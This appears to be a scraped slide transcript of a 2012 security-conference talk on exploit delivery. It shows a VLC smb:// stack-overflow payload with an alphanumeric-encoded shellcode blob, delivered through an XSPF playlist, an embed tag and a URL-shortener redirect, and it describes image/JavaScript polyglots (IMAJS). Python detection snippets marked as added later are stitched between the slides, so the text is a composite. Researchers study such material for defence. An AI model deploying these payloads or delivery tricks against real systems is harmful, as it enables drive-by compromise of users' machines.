Innovative Exploit Delivery


Published on October 11, 2012

Author: saumilshah

Source: slideshare.net

Description

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

INNOVATIVE EXPLOIT DELIVERY
Saumil Shah, net-square
HITB2012KUL

# who am i

Saumil Shah, CEO Net-Square.
• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.
• M.S. Computer Science, Purdue University.
• saumil@net-square.com
• LinkedIn: saumilshah
• Twitter: @therealsaumil

My area of work
• Penetration Testing
• Reverse Engineering
• Exploit Writing
• New Attack Research
• Offensive Security
• Defense
• Conference Speaker
• "Eyes and ears open"

When two forces combine...
• Web Hacking
• Binary Exploits

SNEAKY + LETHAL


302 / IMG / JS / HTML5


VLC smb overflow
• smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}
• Classic Stack Overflow.

VLC XSPF file

<?xml version="1.0" encoding="UTF-8"?>
<playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
  <title>Playlist</title>
  <trackList>
    <track>
      <location>smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}</location>
      <extension application="http://www.videolan.org/vlc/playlist/0">
        <vlc:id>0</vlc:id>
      </extension>
    </track>
  </trackList>
</playlist>

Alpha Encoded Tiny ZOMFG Exploit URL

100% Pure Alphanum!

VLC smb overflow - HTMLized!!

<embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" />

301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA}Content-type: text/htmlContent-Length: 0Connection: closeServer: TinyURL/1.6 net-square
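An added defensive check, not part of the talk: parse a shortener's redirect response and refuse to follow a Location like the one above (non-web scheme, a userinfo part that masks the real host, an oversized fragment). The sample response is constructed, and the 128-character fragment threshold is an assumed policy value.

```python
from typing import List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
MAX_FRAGMENT_LEN = 128  # assumed policy threshold, tune per deployment
REDIRECT_CODES = {b"301", b"302", b"303", b"307", b"308"}

def location_from_response(raw: bytes) -> Optional[str]:
    """Pull the Location header out of a raw HTTP redirect response."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    status = lines[0].split()
    if len(status) < 2 or status[1] not in REDIRECT_CODES:
        return None
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"location":
            return value.strip().decode("latin-1")
    return None

def redirect_problems(location: str) -> List[str]:
    """Reasons a client or proxy should refuse to follow this target."""
    problems = []
    parts = urlsplit(location)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        problems.append(f"non-web scheme '{parts.scheme}'")
    if "@" in parts.netloc:
        # 'example.com@0.0.0.0' puts a friendly name in the userinfo slot;
        # the host actually contacted is whatever follows the '@'.
        userinfo, host = parts.netloc.rsplit("@", 1)
        problems.append(f"userinfo '{userinfo}' in front of real host '{host}'")
    if len(parts.fragment) > MAX_FRAGMENT_LEN:
        # The fragment never reaches the server, so it is a convenient place
        # to park a long payload for whatever parses the URL on the client.
        problems.append(f"fragment of {len(parts.fragment)} chars")
    return problems

def safe_to_follow(raw: bytes) -> bool:
    loc = location_from_response(raw)
    return loc is not None and not redirect_problems(loc)

# Constructed sample shaped like the tinyurl response on the slide, with a
# short run of 'A's standing in for the encoded payload in the fragment.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 301 Moved Permanently\r\nX-Powered-By: PHP/5.2.12\r\n"
    b"Location: smb://example.com@0.0.0.0/foo/#{" + b"A" * 300 + b"}\r\n"
    b"Content-type: text/html\r\nContent-Length: 0\r\nConnection: close\r\n\r\n"
)
```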


Exploits as Images - 1
• Grayscale encoding (0-255).
• 1 pixel = 1 character.
• Perfectly valid image.
• Decode and Execute!


I'm an evil Javascript
I'm an innocent image

<CANVAS>

c) no eval()

Same Same No Different!

var a = eval(str);
a = (new Function(str))();

d) IMAJS

IMAJS: Seeing is Believing

Browser Support for IMAJS-GIF

Height  Width  Browser/Viewer    Image Renders?  Javascript Executes?
2f 2a   00 00  Firefox           yes             yes
2f 2a   00 00  Safari            yes             yes
2f 2a   00 00  IE                no              yes
2f 2a   00 00  Chrome            yes             yes
2f 2a   00 00  Preview.app       yes             -
2f 2a   00 00  XP Image Viewer   no              -
2f 2a   00 00  Win 7 Preview     yes             -

Browser Support for IMAJS-BMP

Height  Width  Browser/Viewer    Image Renders?  Javascript Executes?
2f 2a   00 00  Firefox           yes             yes
2f 2a   00 00  Safari            yes             yes
2f 2a   00 00  IE                yes             yes
2f 2a   00 00  Chrome            yes             yes
2f 2a   00 00  Opera             yes             yes
2f 2a   00 00  Preview.app       yes             -
2f 2a   00 00  XP Image Viewer   yes             -
2f 2a   00 00  Win 7 Preview     yes             -
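An added detection check, not from the talk: flag GIF or BMP files whose header bytes double as the "/*" that opens a JavaScript comment, the "2f 2a 00 00" pattern in the tables above, and note where a matching "*/" appears. The three sample blobs are constructed header stubs, not real images.

```python
import struct
from typing import List

JS_COMMENT_OPEN = b"/*"
JS_COMMENT_CLOSE = b"*/"

def imajs_indicators(data: bytes) -> List[str]:
    """Reasons an image blob looks like an image/JavaScript polyglot."""
    reasons = []
    if len(data) >= 10 and data[:6] in (b"GIF87a", b"GIF89a"):
        # GIF logical screen: 2-byte little-endian width at offset 6, height at 8.
        width, height = struct.unpack("<HH", data[6:10])
        if data[6:8] == JS_COMMENT_OPEN:
            reasons.append(f"GIF width field is '/*' (0x{width:04x})")
        if data[8:10] == JS_COMMENT_OPEN:
            reasons.append(f"GIF height field is '/*' (0x{height:04x})")
    elif len(data) >= 10 and data[:2] == b"BM":
        # BMP: the 4-byte file-size field at offset 2; the viewers in the
        # table above still render the image with '/*' in its first bytes.
        if data[2:4] == JS_COMMENT_OPEN:
            reasons.append("BMP size field begins with '/*'")
    if reasons and JS_COMMENT_CLOSE in data[10:]:
        # A comment opener in the header only matters if a '*/' closes it
        # and script follows; record where, for triage.
        reasons.append(f"'*/' at offset {data.index(JS_COMMENT_CLOSE, 10)}")
    return reasons

def is_suspected_imajs(data: bytes) -> bool:
    return bool(imajs_indicators(data))

# Constructed header-only stubs: a plain 1x1 GIF89a, a GIF whose width bytes
# are '/*' as in the IMAJS-GIF table above, and the BMP equivalent.
BENIGN_GIF = b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00" + b"\x00" * 16
POLYGLOT_GIF = b"GIF89a" + b"/*\x00\x00" + b"\x80\x00\x00" + b"\x00" * 16 + b"*/x=1;"
POLYGLOT_BMP = b"BM" + b"/*\x00\x00" + b"\x00" * 20 + b"*/x=1;"
```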

e) The αq exploit

Encode using Alpha channel

Demo: IMAJS αq FTW!

f) ONE LAST DEMO!!!

The FUTURE?
• HTML5 Video
• SVG
• WebGL
• Mobile Browsers

KTHXBAI. See you in 2013??
saumil@net-square.com | @therealsaumil
